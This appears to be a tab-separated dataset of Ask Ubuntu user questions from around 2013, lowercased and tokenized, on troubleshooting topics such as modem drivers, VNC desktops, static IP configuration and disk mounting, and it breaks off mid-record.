330925	unable to access mounted iso through terminal	can anyone tell me please what i 'm doing wrong ? thanks . p.s since i do n't have enough reputation for posting pics ( very annoying ! ) i attacheed a link for my dropbox https : //www.dropbox.com/s/l5wox3c1r1w2ylf/screenshot % 20from % 202013-08-10 % 2017 % 3a11 % 3a14.png
330927	what will be the primary os	i was just wondering , if i download ubuntu to my laptop which has a windows 8 as its os , will i be able to use either ubuntu or windows as its os ? or will ubuntu be the primary os ?
330934	low information density ( icons too sparse ) in nautilus on ubuntu 13.04	information density in nautilus on ubuntu 13.04 is way too low for me ; i.e . too few lines fits on the screen to my liking . for example , here 's the same directory displayed in nautilus in ubuntu 12.04 ( ok ) : http : //i298.photobucket.com/albums/mm249/hrenistic/nautilus_800x600_u1204_zps447df9e4.png and in ubuntu 13.04 ( way too sparse ) : http : //i298.photobucket.com/albums/mm249/hrenistic/nautilus_800x600_u1304_zpsa4484a78.png how do i make nautilus display files in a more compact mode ?
330935	error while loading shared libraries : libudev.so.0 - brackets	i installed brackets on lubuntu 13.04 . when i use the command brackets to open it , i get the error : /usr/lib/brackets/brackets : error while loading shared libraries : libudev.so.0 : can not open shared object file : no such file or directory . how can i get brackets to work ?
330937	is it possible to open an ubuntu app from html ?	i 'm creating a webpage right now and am wondering if it is possible to input a command in html that will open an installed ubuntu app like chromium , or a terminal window , or nautilus . is something like this possible ? thanks !
330940	application launcher on 13.04 missing	i ordered 13.04 on ebay , but when i installed it the application launcher was missing . i could only open applications from the terminal . i installed ccsm , but it did n't make any difference .
330941	connecting two separate machines to the same network	i 'm using hadoop to do some data analysis for a university project . my university has kindly given me access to a virtual machine , which i access through a given ip address using putty in windows 8 . once connected , the system is running ubuntu 64bit . before i put anything on this system i am testing it on my own laptop . i have oracle 's virtualbox and a ubuntu 64 bit installation on it . as my `` main work '' is being done on the virtual machine the university has given me access to , thus far i 'm using hadoop on a single cluster ( defying the whole point of the `` big data analysis '' part of my project ) . is there a way for me to connect that virtual machine to my virtualbox version of ubuntu to at least demonstrate a cluster of two nodes , or is this impossible as they are not on the same network ?
330943	pre-upgrade questions about upgrading from ati 4870 to nvidia gtx650 on 12.04	i 'm upgrading my computer 's video card . i 've been using the open source 'radeon ' driver with an amd hd4870 . my new card is a nvidia gtx650 that i 'm planning on using the proprietary drivers with . i know if you 're using the flgrx drivers for ati/amd , you have to remove those first before installing your new card . since i 'm using the radeon open source drivers , how do i go about making sure i do n't reboot into an unworking display ? do i need to remove or otherwise make some sort of configuration prior to removing the hd4870 and installing the gtx650 ? thanks !
330948	does ubuntu 13.04 have a desktop environment built-in ?	i have a vps on which i 'm planning to install ubuntu 13.04 .. i plan to use vnc to access this vps . currently i use 11.04 , which is very much outdated now . when i installed 11.04 , i had to follow a guide ( here ) to first install ubuntu-desktop and then install gnome , and then i could get vnc up and running ? so would i have to manually install this stuff for 13.04 as well ? or does it come built-in now ? if its still requires manual installation , are there any guides ( i 'm a n00b at this ) ?
330949	how can i change position switcher ( alt-tab ) ?	i want to change the position and size switcher ( alt + tab ) . as
330951	swap partition on 13.04 not working	i have installed ubuntu 13.04 on my dell studio 1555 laptop and the swap partition is n't mounting or the system is just not using it . i have been using ubuntu sense 10.04 and have never had this problem before , until 13.04 . i have reinstalled it a few times and still it does n't work and i have even install 13.04 on a usb drive and have it partitioned with both a ext4 and a swap partition in it was well and even on that usb drive it still does n't use swap . here is the output of the command 'free ' : total used free shared buffers cached mem : 4007744 1897780 2109964 0 122124 929832 -/+ buffers/cache : 845824 3161920 swap : 4198396 0 4198396 in gparted it shows that i have the swap partition with not errors on both the hard drive of my computer and the usb drive . so this is making me think it is something to do with ubuntu but i ca n't seem to find where anyone else is having this issue . if there is anymore information you need just let me know what and where to get it and i will do what i can . thank you for your help !
330953	cross compiling a dvd driver for arm	i 've just registered on the codeforge website & downloaded the sunplus dvd driver at : http : //www.codeforge.com/article/166926 i 'm using ubuntu 64 bit 12.04 & have installed the linaro toolchain for arm . when i try to run '/usr/bin/arm-linux-gnueabi-gcc ' after cd-ing to the directory containing the extracted sunplus dvd driver , i get `` arm-linux-gnueabi-gcc : fatal error : no input files '' . i 've also tried '/usr/bin/arm-linux-gnueabi-gcc sunplus.asm ' ( after cd-ing to customers : a directory within the extracted files , since sunplus is the dvd device name according to lsusb ) but i get : /usr/lib/gcc/arm-linux-gnueabi/4.7/../../../../arm-linux-gnueabi/bin/ld : sunplus.asm : file format not recognized ; treating as linker script /usr/lib/gcc/arm-linux-gnueabi/4.7/../../../../arm-linux-gnueabi/bin/ld : sunplus.asm:1 : syntax error collect2 : error : ld returned 1 exit status i 've also tried 'as sunplus.asm ' ( after cd-ing to the sub-directory containing customers ) but get lots of errors e.g . sunplus.asm : assembler messages : sunplus.asm:1 : error : junk at end of line , first unrecognized character is *' sunplus.asm:3 : error : no such instruction : sunplus_dvd *' sunplus.asm:5 : error : junk at end of line , first unrecognized character is *' sunplus.asm:6 : error : no such instruction : sunplus.asm is standard iop config' sunplus.asm:7 : error : no such instruction : we can compile ioprom22_v.inc for customers' sunplus.asm:8 : error : junk at end of line , first unrecognized character is=' sunplus.asm:9 : error : no such instruction : define sphe8200 or sphe8202' sunplus.asm:10 : error : junk at end of line , first unrecognized character is=' sunplus.asm:11 : error : no such instruction : sphe8202 equ 1' sunplus.asm:11 : error : no such instruction : define it for sphe8202' sunplus.asm:12 : error : no such instruction : `sphe8200 equ 0' i 'm not a 'c ' or 'assembler ' person . can anybody tell me what to do ?
330958	can not type in vi when trying to edit the interfaces file	i am trying to edit the interfaces file so i can put in my network settings . this is what i 'm typing : sudo vi /etc/network/interfaces the file pulls up fine . i seem to be able to delete all rows , inadvertently , by hitting the d key ... which really confuses me . it wo n't let me type , at all . i can not use any other editor since i can not connect to the internet until i get this file updated . i only have 1 user on the system and i 'm logged in as that . at least , during the install , that is all they prompted me for . what am i doing wrong ?
330960	full ubuntu on arm device ( specifically android based ) ?	can full ubuntu run on arm based devices especially the current high end android devices ? i in particular require complete development environment ( gcc , python , mysql etc ) assuming there is enough ram in the device . are there repositories with arm versions of all ubuntu packages that we can install from ? also , is ubuntu touch a full fledged ubuntu installation or can i set it up to be one ?
330961	should i install ubuntu 13.04 64bit ?	my computer has a dual core cpu and it 's speed is 2 ghz and it has 3 gb ram the motherboard is an intel dq965gf . is 64bit faster and do i have enough ram ? is it worth upgrading ? will there be better performance from 64 bit/ thanks to all who answer this
330966	input/ouput error	tried to search a solution , but this issue is common but it can be very specific too . this is what i 'm getting . rskyline @ rskyline-desktop : /media/datos/android/cyanogenmod $ make clobber ============================================ platform_version_codename=rel platform_version=4.3 cm_version= target_product=full target_build_variant=eng target_build_type=release target_build_apps= target_arch=arm target_arch_variant=armv7-a target_cpu_variant=generic host_arch=x86 host_os=linux host_os_extra=linux-3.8.0-28-generic-x86_64-with-ubuntu-13.04-raring host_build_type=release build_id=jss15j out_dir=/media/datos/android/cyanogenmod/out ============================================ checking build tools versions ... rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/magicsmokewallpapers.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/mediaprovider.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/nfcnci.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/onetimeinitializer.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/phasebeam.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/phone.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/provision.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/settingsprovider.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/sharedstoragebackup.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/soundrecorder.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/stk.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/systemui.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/tag.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/telephonyprovider.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/term.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/themechooser.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/thememanager.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/torch.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/userdictionaryprovider.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/videoeditor.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/visualizationwallpapers.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/voicedialer.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/voiceplus.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/vpndialogs.apk» : error de entrada/salida rm : no se puede borrar «/media/datos/android/cyanogenmod/out/target/product/mako/system/app/webaudiores.apk» : error de entrada/salida make : *** [ clean ] error 1 rskyline @ rskyline-desktop : /media/datos/android/cyanogenmod $
330967	how to solve the problem of the installation huawei modem e303c in ubuntu 13.04	i am trying to install huawei modem software . but it is not being installed . it is showing like this : bhaskar @ bhaskar : ~ $ cd desktop/driver bhaskar @ bhaskar : ~/desktop/driver $ sudo ./install old path =/usr/local/mobile_partner/driver fatal : module option is in use . driver copy start sta_path_flag= . sta_path_full=/home/bhaskar/desktop/driver/install start_path_driver=/home/bhaskar/desktop/driver current install from ./install install_path is not set , auto install install_path=/usr/local/mobile_partner install_path is another path rm /usr/local/mobile_partner/driver driver copy end ls : can not access /etc/usb_modeswitch.d/ : no such file or directory /usr/local/mobile_partner/driver/ndis_driver error : missing module or filename . libkmod : error ../libkmod/libkmod-module.c:753 kmod_module_remove_module : could not remove 'cdc_ether ' : no such file or directory error : could not remove module cdc_ether : no such file or directory libkmod : error ../libkmod/libkmod-module.c:753 kmod_module_remove_module : could not remove 'usbnet ' : resource temporarily unavailable error : could not remove module usbnet : resource temporarily unavailable libkmod : error ../libkmod/libkmod-module.c:753 kmod_module_remove_module : could not remove 'hw_cdc_driver ' : no such file or directory error : could not remove module hw_cdc_driver : no such file or directory make -c src/ clean make [ 1 ] : entering directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' rm -rf *.o *.ko *~ core* .dep* . *.d . *.cmd *.mod.c *.a *.s . *.flags .tmp_versions module.symvers modules.symvers *.order /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/add_header.sh `` clean '' `` /lib/modules/3.8.0-19-generic/build/include/linux/usb '' rmmod -f hw_cdc_driver libkmod : error ../libkmod/libkmod-module.c:753 kmod_module_remove_module : could not remove 'hw_cdc_driver ' : no such file or directory error : could not remove module hw_cdc_driver : no such file or directory make [ 1 ] : *** [ clean ] error 1 make [ 1 ] : leaving directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' make : *** [ clean ] error 2 make -c src/ modules make [ 1 ] : entering directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' # /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/add_header.sh `` modules '' `` /lib/modules/3.8.0-19-generic/build/include/linux/usb '' make -c /lib/modules/3.8.0-19-generic/build subdirs=/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src modules make [ 2 ] : entering directory `/usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.o /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c : in function ‘__check_ncm_prefer_32’ : /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:113:1 : warning : return from incompatible pointer type [ enabled by default ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c : in function ‘__check_ncm_prefer_crc’ : /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:116:1 : warning : return from incompatible pointer type [ enabled by default ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c : in function ‘__check_rt_debug’ : /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:128:1 : warning : return from incompatible pointer type [ enabled by default ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c : in function ‘hw_change_mtu’ : /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:899:2 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘size_t’ [ -wformat ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c : in function ‘rx_tlp_parse’ : /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:1085:7 : warning : iso c90 forbids mixed declarations and code [ -wdeclaration-after-statement ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c : in function ‘tx_complete’ : /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:1663:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘size_t’ [ -wformat ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c : in function ‘cdc_ncm_config’ : /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:2036:24 : warning : comparison of distinct pointer types lacks a cast [ enabled by default ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:2037:3 : warning : comparison of distinct pointer types lacks a cast [ enabled by default ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:2037:3 : warning : comparison of distinct pointer types lacks a cast [ enabled by default ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:2041:21 : warning : comparison of distinct pointer types lacks a cast [ enabled by default ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:2057:3 : warning : format ‘ % u’ expects argument of type ‘unsigned int’ , but argument 4 has type ‘long unsigned int’ [ -wformat ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c : in function ‘hw_cdc_probe’ : /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:2589:3 : error : implicit declaration of function ‘dbg’ [ -werror=implicit-function-declaration ] cc1 : some warnings being treated as errors make [ 3 ] : *** [ /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.o ] error 1 make [ 2 ] : *** [ _module_/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src ] error 2 make [ 2 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic' make [ 1 ] : *** [ modules ] error 2 make [ 1 ] : leaving directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' make : *** [ modules ] error 2 make -c src/ install make [ 1 ] : entering directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' # install -m 744 -c hw_cdc_driver.o /lib/modules/3.8.0-19-generic/kernel/drivers/usb/net # depmod -a # modprobe hw_cdc_driver /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/add_header.sh `` install '' modprobe hw_cdc_driver fatal : module hw_cdc_driver not found . make [ 1 ] : *** [ install ] error 1 make [ 1 ] : leaving directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' make : *** [ install ] error 2 install ndis driver failed . the compiling environment is not all ready . please check gcc , make and kernel buid ( /lib/modules/3.8.0-19-generic/build ) to be all installed ? now please enter any key to finish other installations . lndis is disabled , and only modem can be used . target_path = target_path = have usb_modeswitch rules to huawei datacard : count=0 addrunlevel=/etc/rc4.d ‘/etc/rc4.d/s99runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ‘/etc/rc4.d/k10runhwactivator’ - > ‘/etc/init.d/runhwactivator’ addrunlevel=/etc/rc5.d ‘/etc/rc5.d/s99runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ‘/etc/rc5.d/k10runhwactivator’ - > ‘/etc/init.d/runhwactivator’ addrunlevel=/etc/rc2.d ‘/etc/rc2.d/s99runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ‘/etc/rc2.d/k10runhwactivator’ - > ‘/etc/init.d/runhwactivator’ addrunlevel=/etc/rc3.d ‘/etc/rc3.d/s99runhwactivator’ - > ‘/etc/init.d/runhwactivator’ ‘/etc/rc3.d/k10runhwactivator’ - > ‘/etc/init.d/runhwactivator’ bhaskar @ bhaskar : ~/desktop/driver $ please tell me how i can solve this problem . i have tried with mobile partner software other versions.. the problem is the same for all . with thanks , bhaskar
330971	any audio ( not music ) and video organizer ?	i have video and audio files where i am playing different instruments in different keys and beats . i would like to have a software where i can 'label ' the different files with different categories , so then i can search easily , for example , 'didgeridoo videos in 7 beats ' . so , bassicaly , something like calibre or shotwell but for audio and video ( not music ) .
330972	windows network settings translated to ubuntu	i was reading this post on entering a static ip . it says to change these settings : iface eth0 inet static address 192.168.1.100 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.254 what is the windows equivalent to network and broadcast . i 'm new to ubuntu but i 'm familiar with windows . also , where do i put the dns server ips at ? i have two ips for dns . thanks for the help ! ** edit ** i found the dns server changes here : http : //www.liberiangeek.net/2012/05/setup-static-dns-servers-in-ubuntu-12-04-precise-pangolin/
330974	set classpath for python	i want to execute a python file called `` ex1.py '' . the execution works fine , the program does , what it ought to do . the problem is the following : this file is stored in the folder `` /user_name/pythonex '' . so , everytime i want to execute this file i have to write `` cd pythonex '' and then `` python ex1.py '' . i 'm wondering whether it 's possible to just write `` python ex1.py '' , meaning skipping the `` cd pythonex '' line . i tried to write to open the `` .bashrc '' file and write `` export classpath=/user_name/pythonex '' and save it . i restart the terminal yet an error message apppears saying `` python : ca n't open file 'ex1.py ' : [ error 2 ] no such file or directory '' could someone please tell me how to execute a file by just typing in the terminal `` python [ file-name ] .py '' ? thanks in advance . best regards
330983	no desktop showing in ubuntu 13.04 via vnc on a vps	i have a vps on which till now i 've been using ubuntu 11.04 ... this os is very outdated now , so i decided to give 13.04 a shot ... so i 've just installed ubuntu 13.04 on my vps ... after installation , i connected via putty as root , and ran the following commands exactly : to update the repository : apt-get update to install the desktop version : apt-get install ubuntu-desktop apt-get install gnome-session-fallback setting up vnc server : apt-get install tightvncserver vncserver :1 -geometry 1280x960 -depth 16 -pixelformat rgb565 ( then set the password when prompted ) next i rebooted the vps .. after that , again via putty , i edited the xstartup file ... vi ~/.vnc/xstartup ... and added this at the end .. gnome-session & ... so that my xstartup file looks like this : # ! /bin/sh xrdb $ home/.xresources xsetroot -solid grey # x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & # x-window-manager & # fix to make gnome work export xkl_xmodmap_disable=1 /etc/x11/xsession gnome-session & again i rebooted the vps , initiated vnc server , and tried connecting via the vnc , and i get this : i can create folders and stuff on the desktop , but there 's not unity or gnome or anything like this .. i then tried modifying my xstartup file to this ( changed the last 2 lines ) : # ! /bin/sh xrdb $ home/.xresources xsetroot -solid grey # x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & # x-window-manager & # fix to make gnome work export xkl_xmodmap_disable=1 /etc/x11/xsession -- session=2d-gnome & again , i restarted , initiated vnc , and connected , and now i got this : when i press okay , it goes back to the state shown in the first screen .. so how do i fix this .. ? how do i get a proper desktop ? ? : ( i would prefer trying out unity , but i can stick with gnome as well if needed .. for now , i just want to get to my desktop again .. : (
330984	ubuntu 12.04 and 13.04 livecd graphics driver problem ? i 'm using uefi : p	okay , this is my first time asking a question here . i have used ubuntu on my computers for a few years now , and i recently bought a windows 8 ( oh no ! ) ultrabook that i have been trying to put ubuntu on . it is a lenovo p400 touch if that makes a difference . let me get yall ' up to speed : i disable secureboot and fastboot , then successfully installed 13.04 alongside windows 8 with no problems at all . both operating systems were fully functional . then , after installing a few plugins , i restarted ubuntu and i received an error saying i was running in low graphics mode , but i could n't do anything , like , whenever i clicked a button , it did nothing . i decided , no big deal , i will just re-install ubuntu but using 12.04 this time ( i like the lts versions more ) . but ... .. when i boot to the livecd , it will show the menu to choose what to do , but the menu is tiny , scrambled , and scrunched up at the top of the screen and i ca n't tell what anything says . i would like to try nomodeset i guess but i still cant see what i 'm doing . so i decided to reinstall 13.04 because it worked before , but the livecd for that is doing the same thing ! ! ! so is the 12.04 alternate version ! ! ! ! ! i 'm really stumped here you guys ... is there anyone who could offer any advice ? remember , i 'm using uefi , not legacy bios . p.s. , i checked the settings in the uefi menu ( bios ) for any video settings , and i played around with a few things , still nothing .
330986	how to order desktop icons by name in xfce ?	i 'm using xfce 4.8 installed on ubuntu 12.04.2 lts and i 'm wondering what 's the alternative for right-click - > order by name on xfce . right now , when i right click on my desktop , it looks like this : as you can see , there 's no option for rearranging the icons . if my assumption is correct , it ca n't be done directly via gui . i saw this thread , but that does n't really explain how to achieve the same result . any ideas ?
330987	invalid host for ssh forwarding : ssh : could not resolved host name ubuntun1.master : name or service not found	i installed ubuntu 12.04 lts maas server on vmware workstation 6.5 . the ip address is 192.168.43.191 and web ui , maas-dhcp and maas-dns are ready . i added 2 nodes via vmware and all were in ready state . and then i installed juju environment and configured environments.yaml according to ubuntu documentation . then i run juju bootstrap . juju bootstrap had shown successful but as i used vmware and not support wol so i manually start the deployed node . the progress is shown in my attached pictures maas ui , . now juju deployed node ( ubuntun1 ) has been installed ubuntu 12.04 and is waiting in login state . the problem is i have no account to log into that node . on the other hand , i run juju status command on maas server , but all i have is this error msg error : ! [ invalid host for ssh forwarding : ssh : could not resolved host name ubuntun1.master : name or service not found ] . what should i do ? give me some guidance as soon as possible . environments.yaml file
330989	firefox version 23 problem	when i start firefox on ubuntu 12.04 lts , i get this prompt : could not initialize the program 's security component ... i have uninstalled and reinstalled but to no effect . please help .
330990	how to force logout of kubuntu local desktop user	as the admin user on kubuntu 12.04.2 lts how can i force a 2nd or 3rd local desktop user tty session to shutdown without having to switch user and logging in or without killing individual processes ?
330992	auto-unmount usb drive	i used to work for a long time with ubuntu 10.10 and i changed to a recent machine so i had to move to ubuntu 13.04 . one feature i 'm now missing is the auto umount of usb drives . i 've not been able to find easy info on internet .
330994	change the background color of command line in zsh when i change the prompt theme	i installed the zsh package . so , now when i type zsh in terminal it switches from back to zsh . also , i downloaded the oh-my-zsh framework to customize zsh . when i change theme name in .zshrc file to one of the themes given here , it changes the color/type of prompt among other things but the background color stays the same . i want the background color to change to the ones given on that theme wiki page . so , how do i do change the background color automatically to the ones on that page whenever i change my theme ?
330996	k3b audio cd spanning	i need to burn some audio cds for my player , but k3b does n't seem to automaticly burn on multiple cds ( aka splitting the data ) . is there any way to do this automatically ?
330998	how to set up apache , mysql servers ( ubuntu 12.04 lst )	i am hoping to get guidance on using apache and mysql servers on ubuntu 12.04 . i am new to linux , and am trying to setup a `` localhost '' dynamic for basic website design . in windows - i had used a simple free utiliy called xampp which installed apache , mysql , and a localhost folder for my wesite work to reside . though basic , this xampp install worked pretty good for my needs . is there some stable utility in the ubuntu depositories that will give me apache and mysql servers with a '' htdocs ( localhost ) '' folder where i can put websites that are under construction - ( something similar to xampp ) ? if not - instruction on how to manually configure this dynamic would be much appreciated . also , would welcome suggestions as to which is better . thanks .
331000	unable to write to virtual drive placed on different drive in the same hardisk using virtualbox	so here is the condition , my initial condition is as same as this thread . but the problem is , i have following the same procedure and it just does not work . the virtual machine failed to write to its virtual drive , and giving an error message . i also tried to make a symlink virtual vms in my home folder that linked to other drives ( say /media/foo ) . but it also gave me with the similar error report ( it failed to write to the virtual drive ) . i have no idea about how to fix it . unfortunately i failed to collect the error report to be posted here . i am using the latest virtualbox version 4.2.16 . [ edit ] i found this virtualbox log on my home folder : log created : 2013-08-10t14:11:28.524781000z executable : /usr/lib/virtualbox/virtualbox arg [ 0 ] : /usr/lib/virtualbox/virtualbox arg [ 1 ] : -- comment arg [ 2 ] : ubuntu server arg [ 3 ] : -- startvm arg [ 4 ] : 0eba427d-9e1e-4837-be9b-274803e2bbb1 arg [ 5 ] : -- no-startvm-errormsgbox there are more than 32 requests active perhaps anyone understand what the problem is ?
331001	using old spare laptop as a monitor	just got a new laptop and installed ubuntu on it . i have an old one that also runs ubuntu . is there a way i can use the old laptop as an additional screen for the work i do on my new laptop ? i saw some solutions for windows , but who wants to use windows .
331005	how to fix a mobile modem that worked with ubuntu 12.10 but does n't with 13.04 ?	i upgraded from ubuntu 12.10 to 13.04 and now i can not connect to my mobile internet service . it worked perfectly before but it no longer does with 13.04 . i have a huawei modem from the paraguayan company personal . it gets detected but it does not connect to the network . i tried it in other notebooks and it does n't work there either . i was told that it is a problem with the new ubuntu . how i can fix it . thank you . model of modem usb huawei model : e173s - 6
331006	how does one read encrypted e-mail sent from thunderbird	i sent a test message to another yahoo mail account to see if encrypted e-mail works . when sent the test message , it came through on yahoo mail as 2 attachments , the first of which could not be decrypted by thunderbird and the second , telling me the file already exists in a huge window , and that i have to rename it.. which after doing it did absolutely nothing.. so to the point.. once you send an e-mail encrypted thunderbird/enigmail , how does the person receiving the e-mail actually get to read it ?
331007	ubuntu stuck on black screen in boot	the computer i 'm trying to install on has no other os on it . after seeing the screen that asks if i want to try ubuntu without installing install ubuntu check disk for defects test memory boot from first hard disk i select install ubuntu and it takes me to the normal black screen but mine gets stuck on it and never continues the boot . after this i tried using a usb that i created with netbooter or something , after clicking install ubuntu it says binary white listed and does n't work .
331008	adjust speed of trackball mouse need extra help	i have just gotten a new trackball mouse , the only problem is it is to sensitive , and it 's hard to do precise work . i have searched google , software center , synaptic manager , and , several forums . i have tried xset , xinput , xconfig ( sp ) , and creating text files . nothing is working , does anyone know of any other way of adjusting the speed ? it would also be nice if i could change function of a couple of buttons , but this is not something i 'm going to spend alot of time on . any help would be greatly appreciated . i want it slow when doing precise work , and fast when moving across the screen . i am a complete noob and need someone to explain how to use the tools not just point me to a command line . thanks
331009	script to add static ip to network interfaces	i 've got a little script here that should be pretty self explanatory but i ca n't figure out why the while loop does n't handle the functions right . it should show the getinfo function again if the user presses n for no and if the user press yes it should execute the writeinterfacefile function . what is wrong whith my loop ? # ! /bin/bash echo `` let 's set up a static ip address for your site '' echo '' '' getinfo ( ) { read -p `` enter the ip of your router : ( looks like 192.168.1.1 ) `` routerip read -p `` enter the netmask for your network : ( looks like 255.255.255 `` netmask read -p `` enter the ip address for your server : ( looks like 192.168.1.22 `` staticip } writeinterfacefile ( ) { cat < < eof > > /home/ubuntu/test # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp # your static network configuration iface eth0 inet static address echo $ staticip netmask echo $ netmask gateway echo $ routerip eof } clear getinfo echo '' '' echo '' so your settings are '' echo `` address of your router is `` echo -n $ routerip echo `` the mask fpr the network is `` echo -n $ netmask echo `` your decided server ip is `` echo -n $ istaticp echo '' '' echo `` are these informations correct ? ( y/n ) '' while true ; do read -p `` are these informations correct ? [ y/n ] '' yn ? case $ yn in [ yy ] * ) writeinterfacefile ; ; [ nn ] * ) getinfo ; ; * ) echo `` pleas enter y or n '' ; ; esac done
331010	xubuntu 13.04 + xmonad alongside xfce	is it a possibility to run xmonad with the menus etc from xfce ? or is there any other tiling window manager that behaves in the same way but can retain the vanilla xfce ?
331015	how can i make an unallocated sd partition usable ?	when i plugin my sd card , my ubuntu 13.04 does n't list it . but when i check it from the terminal using the ls command by /dev/sd* it shows the device , but still remains unmounted . i formatted it using the diskpart command in windows . how can i make this unmounted space to a usable form ?
331018	wired connection to lan , but no internet	in my college we have a lan network through which we can access the internet and dc++ . this requires registration of a mac address which i have done . initially the network used to connect to the lan ( it showed that wired network was connected ) but there was no internet access . i restarted my machine with the network cable plugged in . this lead to an error displaying device not configured . i fixed this by reading a question online . now my machine connects to the lan with no internet access . the network works fine on windows . ifconfig -a eth0 link encap : ethernet hwaddr b8 : ca:3a : d7:67 : f5 up broadcast multicast mtu:1500 metric:1 rx packets:2818 errors:0 dropped:0 overruns:0 frame:0 tx packets:197 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:210007 ( 210.0 kb ) tx bytes:11502 ( 11.5 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1076 errors:0 dropped:0 overruns:0 frame:0 tx packets:1076 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:105216 ( 105.2 kb ) tx bytes:105216 ( 105.2 kb ) wlan0 link encap : ethernet hwaddr 60:6c:66:86:81 : c0 inet addr:192.168.150.107 bcast:192.168.150.255 mask:255.255.255.0 inet6 addr : fe80 : :626c:66ff : fe86:81c0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx 